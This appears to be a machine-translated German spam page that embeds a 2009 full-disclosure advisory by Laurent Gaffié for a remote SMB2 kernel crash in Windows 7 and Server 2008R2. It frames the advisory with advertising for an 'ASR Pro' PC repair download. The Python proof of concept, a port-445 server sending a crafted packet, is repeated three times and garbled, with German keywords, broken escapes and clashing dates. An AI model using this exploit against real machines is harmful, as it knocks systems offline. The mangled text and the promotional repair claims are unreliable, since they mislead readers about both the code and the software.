Gelöst: Vorschläge Zur Behebung Von Windows 7 / Server 2008r2-Remote-Kernel-Abstürzen.

Table of Contents

Genehmigt

1. ASR Pro herunterladen

2. Öffnen Sie das Programm und wählen Sie „Computer scannen“

3. Klicken Sie auf "Reparieren", um den Reparaturvorgang zu starten

Die Software zur Reparatur Ihres PCs ist nur einen Klick entfernt – laden Sie sie jetzt herunter.

Wenn Windows 7 / Server 2008r2 Remote Kernel auf Ihrem Notebook abstürzt, hoffen wir, dass dieses Benutzerhandbuch Ihnen bei der Behebung des Problems helfen kann. g.Microsoft Windows 7 / Server 2009 R2 SMB-Client Endlosschleife: Es nutzt einen Fehler bei der Durchführung von Operationen bei Microsoft Windows SMB-Kunden unter Windows 7 plus Windows Server 2008 R2. Es scheitert meistens an einem bestimmten Remote-Kernel. Das Metasploit Framework besteht aus einem Modul, um eine gute Schwachstelle auszunutzen.

  #! oder usr / bin / python# win7-crash.Trigger py:# weit entfernt Kernel-Absturz auf Host-Hosting-Server Win7 und 2008R2 (Endlosschleife)# KeAccumulateTicks () stürzt ab aufgrund von NT_ASSERT () / DbgRaiseAssertionFailure () verursacht mit mächtigen# Endloser Zyklus.# KEIN BSOD, SIE MÜSSEN DEN VERBINDER TRENNEN.# Um alles schnell anzurufen; der Reihe nach:  this_script_ip_addr  BLAH, stürzt mühelos ab# Autor: Laurent Gaffi¯ ¿ ½Socket-Server importierenPaket = (" x00  x00  x00  x9a" Datenträgerlänge ---> muss 9 sein, kaum 9a .." xfe  x53  x4d  x42  x40  x00  x00  x00  x00  x00  x00  x00  x00  x00  x01  x00"" x01  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x41  x00  x01  x00  x02  x02  x00  x00  x30  x82  xa4  x11  xe3  x12  x23  x41"" xaa  x4b  xad  x99  xfd  x52  x31  x8d  x01  x00  x00  x00  x00  x00  x01  x00"" x00  x00  x01  x00  x00  x00  x01  x00  xcf  x73  x67  x74  x62 x60  xca  x01 "" xcb  x51  xe0  x19  x62  x60  xca  x01  x80  x00  x1e  x00  x20  x4c  x4d  x20"" x60  x1c  x06  x06  x2b  x06  x01  x05  x05  x02  xa0  x12  x30  x 10  xa0  x0e"" x30  x0c  x06  x0a  x2b  x06  x01  x04  x01  x82  x37  x02  x02  x0a")SMB2-Klasse (SocketServer.BaseRequestHandler):  Def-Handle (sie selbst):        print "Wer:", self.client_address        "DANKE SDL" verwenden       Der Eintrag impliziert self.request.recv (1024)        Selbstanfrage.senden (Paket)        selbst.anfrage.schließen ()launch = SocketServer.TCPServer (('', 445), SMB2) # alle Verbindungen abhören Stadt 445launch.serve_forever ()

Dieser Fehler ist ein wichtiger Beweis dafür, dass bestimmte SDL FAIL
Das Ziel des Hauptfehlers ist eine Endlosschleife über smb1,2, Vorauthentifizierung, nur keine Anmeldeinformationen vorhergesagt …
Kann im nächstgelegenen Netzwerk über (IE *) gestartet werden
Der Fehler ist in der Regel so einfach, dass er vor 2 Jahren von einem identifizierbaren SDL hätte erfahren müssen, wenn der SDL bereits überlebt hat:

netbios_header = struct.pack (“> i”, len (”. join (SMB_packet)) + SMB_packet
(Die netbios h2-Tags geben die Lücke des neuen smb1,2-Pakets an.)

Wenn die genaue netbios_header-Nummer ein paar Bytes kleiner oder größer als SMB_packet ist, ist die Situation derzeit einfach verletzt!
WELCHE ART ?? Willst du mich verarschen, in welchem ist mein SDL?!?

windows ten / server 2008r2 Remote-Kernel-Absturz

“Das sicherste Betriebssystem auf der Glühbirne. е “;
Dass Ihr korrekter Plan konfiguriert ist, sollte über einen IE entfernt werden, auch mit nbns-Broadcast-Alternative (keine Benutzerinteraktion)

==============================================
– Erscheinungsdatum: 11. November 2011
– Entdeckt von: Laurent Gaffier
– Schweregrad: mittel / hoch
=============================================

Windows 7 / Remote-Computer 2008r2 Remote-Kernel-Absturz

NS. BESTÄTIGUNG DES KONZEPTS
————————–
# win7-crash.py:
# Ausführen eines echten Remote-Kernel-Absturzes für Win7 und damit Server 2008R2 (Endlosschleife)
# KeAccumulateTicks () stürzte unerwartet auf NT_ASSERT () / DbgRaiseAssertionFailure () ab, verursacht durch # starke Endlosschleife.
# KEIN BSOD, DU HAST EINEN KORKEN.
# Es ist schnell anzurufen; der Reihe nach: this_script_ip_addr BLAH, sofort abnehmen
# Gepostet von Laurent Gaffier
#

Paket = (Zahl ” x00 x00 x00 x9a” —> 9. Länge sollte wirklich 9a sein ..
” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00 “
” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″
” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e”
” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)

V. WIRTSCHAFTLICHE AUSWIRKUNGEN
————————–
Ein Feind kann jeden Windows 2008R2-Server 7 aus der Ferne deaktivieren /
im Stadtnetz oder über IE

Vii. Patch-Lösung
————————–
für diesen Fall nicht verfügbar ist, warnt Ihr ISP nicht.
Schließen Sie die SMB-Funktion und die Ports, eventuell wird eine gültige Prüfung bereitgestellt.

X. GESCHICHTE DER VERÄNDERUNGEN
————————–
8. November 2006: MSRC kontaktiert
8. November 2009: MSRC entdeckt Sicherheitslücke
11.11.2009: MRSC versucht mich vor allem zu überzeugen, weil es einen IPv6-Bug gibt, alles von diversen Anbietern, was in Security Bulletins nicht auftauchen sollte.
11. November Jahr: Dieser wertvolle Fehler wurde veröffentlicht.

XI. HINWEISE
————————–
Die in dieser Mitteilung enthaltenen rechtlichen Daten werden “wie besehen” bereitgestellt
ohne Zusicherungen oder Zusicherungen der Zweckmäßigkeit oder anderweitig.
Ich sollte keine Schäden akzeptieren, die derzeit vom Betreiber oder
verursacht werdenMissbrauch dieser Anleitung.

Vollständige OffenlegungMailinglisten-Archive

Remote-Kernelfehler Windows 7 Server 2008R2Von: laurent gaffie
Datum: google30mail Mittwoch, 11. November 2009 05:58:44 – 05:00
=============================================- Datum des Punktes: 11. November 2009- Gerade entdeckt: Laurent Gaffier- Schweregrad: Mittel / Hoch.===============================================I. VERLETZBARKEIT————————–Remote-Kernelsperre Windows 1, * Server 2008R2II. KONTEXT————————–# FAIL, # FAIL, Zahl FAILSDL FAIL, “Das sicherste Betriebssystem aller Zeiten” -> Remote-Kernel im Minutentakt.# FAIL, # FAIL, # FAILIII. BEZEICHNUNG————————–Weitere Informationen und viele Details finden Sie unter: http://g-laurent.blogspot.com/.# Kommentar: Dieser Fehler ist als Windows 7 im Vergleich zu 2008R2 bekannt geworden.NS. KONZEPTIONELLE BEWEIS————————–# win7-crash.py:# Ausführen eines weiteren exotischen Kernel-Absturzes unter Win7 als Ergänzung zu Server 2008R2 (Endlosschleife)# KeAccumulateTicks () stürzt aufgrund von NT_ASSERT () / DbgRaiseAssertionFailure () abSummoningano Endlosschleife.# KEIN BSOD, SIE TRENNEN DEN VERBINDER.# Für einen schnellen Start vom Ziel: this_script_ip_addr BLAH, sofortAbsturz#Autor: Laurent Gaffier#Socket-Server importierenPaket = ” x00 x00 x00 x9a” Nummer —> wahrscheinlich 9., nicht 9a.” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00″” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e”” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”SMB2-Gruppierung (SocketServer.BaseRequestHandler): def überwinden (auto): “Wer:” Bild, self.client_address Der Eintrag impliziert self.request.recv (1024) Selbstanfrage.senden (Paket) selbst.anfrage.schließen ()Start bedeutet SocketServer.TCPServer ((”, 445), SMB2) # das mit allen Ports lauscht445führe interface.serve_forever () aus#SDL-FEHLERV. BUSINESS Angriff des Aggressors————————–und kann bei weitem keine anderen Windows 7 / Server 2008R2 zum Absturz bringen.VI… GEBUCHTE SYSTEME————————–Windows 7, Windows 2008R2VII-Server. LÖSUNG————————–Es gibt keinen Patch zusammen mit dem Moment, der Hersteller liefert darüber keinen Dreck.Schließen Sie das SMB-Element und die Ports, bis ein bestimmtes Audit durchgeführt wird.VIII. VERWEISE————————–http://blogs.msdn.com/sdl/http://g-laurent.blogspot.com/http://twitter.com/g_laurentIX. Kredite————————–Diese Schwäche wurde von Laurent Gaffier umgesetzt. entdecktLaurent.gaffieremove-this (at) gmail.comX. GESCHICHTE DER ÜBERARBEITUNGEN————————–12. November 2009: MSRC kontaktiert.9. November 2009: MSRC hat eine Schwachstelle identifiziert.11. November dieses Jahres: MRSC versucht zu überzeugen, dass auch IPv6 von diversen Anbietern ein Bug ist.sollte nicht in Vorsichtshinweisen erscheinen.11. November 2009: Win Remote einige Kernel Smash veröffentlichtXI. IMPRESSUM————————–Das Material in dieser Mitteilung ist so lang wie „wie es ist“.ohne Garantien oder Angebote von Get, oder manchmal auf andere Weise.Ich bin nicht gewissenhaft für Abnutzung, die durch die Verwendung mit oder entstehtdiese Informationen missbrauchen.XII Persönliche Notizen————————–Weitere Remote-FD @MS-Kernel werden wahrscheinlich zu einem späteren Zeitpunkt kommen.

 ________________________________________________GenderMeine Offenlegung von Informationen - Vertrauen Sie jetzt.Charta: http://lists.grok.org.uk/full-disclosure-charter.htmlGerade gepostet und bezahlt von Secunia Http: // secunia-.com/

Nach Datum Nach Kabel

Aktueller Stream:

Windows Server 2008R2 Leistungsstarker Remote-Kernel-Absturz von Laurent Gaffy (11. November)

Genehmigt

Das ASR Pro-Reparaturtool ist die Lösung für einen Windows-PC, der langsam läuft, Registrierungsprobleme hat oder mit Malware infiziert ist. Dieses leistungsstarke und benutzerfreundliche Tool kann Ihren PC schnell diagnostizieren und reparieren, die Leistung steigern, den Arbeitsspeicher optimieren und dabei die Sicherheit verbessern. Leiden Sie nicht länger unter einem trägen Computer - probieren Sie ASR Pro noch heute aus!